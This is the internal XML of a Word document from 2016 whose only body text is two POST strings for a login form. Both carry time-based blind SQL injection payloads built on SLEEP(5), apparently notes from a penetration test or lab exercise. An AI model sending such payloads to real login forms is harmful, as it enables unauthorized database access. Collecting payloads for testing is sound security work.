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081" w:rsidRDefault="00EE2DE9">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00EE2DE9">
        <w:t>uname=aaa' AND (SELECT * FROM (SELECT(SLEEP(5)))vsuo) AND 'enhR'='enhR&amp;passwd=ss&amp;submit=Submit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008749B0" w:rsidRDefault="008749B0"/>
    <w:p w:rsidR="008749B0" w:rsidRDefault="008749B0">
      <w:r w:rsidRPr="008749B0">
        <w:t>uname=aaa' AND (SELECT * FROM (SELECT(SLEEP(5)))a)%23&amp;passwd=ss&amp;submit=Submit</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00874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832" w:rsidRDefault="009C7832" w:rsidP="007A23EC">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="009C7832" w:rsidRDefault="009C7832" w:rsidP="007A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832" w:rsidRDefault="009C7832" w:rsidP="007A23EC">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="009C7832" w:rsidRDefault="009C7832" w:rsidP="007A2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4A"/>
    <w:rsid w:val="004A6D86"/>
    <w:rsid w:val="004F084A"/>
    <w:rsid w:val="007A23EC"/>
    <w:rsid w:val="008749B0"/>
    <w:rsid w:val="00927081"/>
    <w:rsid w:val="009C7832"/>
    <w:rsid w:val="00E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FF5F29-C52D-44E9-A1E7-96E6AEBF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李文致</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-05-18T09:02:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-05-19T05:52:00Z</dcterms:modified>
</cp:coreProperties>
</file>